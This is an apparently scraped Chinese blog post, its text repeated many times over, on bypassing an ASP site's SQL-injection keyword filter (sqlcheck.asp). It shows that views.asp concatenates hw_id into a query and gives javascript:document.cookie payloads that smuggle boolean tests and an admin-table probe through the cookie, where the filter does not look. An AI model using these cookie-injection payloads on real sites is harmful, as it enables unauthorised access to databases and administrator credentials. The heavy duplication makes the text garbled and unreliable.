  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42122) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42121) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42120) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42119) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42118) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42117) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42116) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42115) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42114) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42113) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42112) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42111) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42110) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42109) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42108) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42107) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
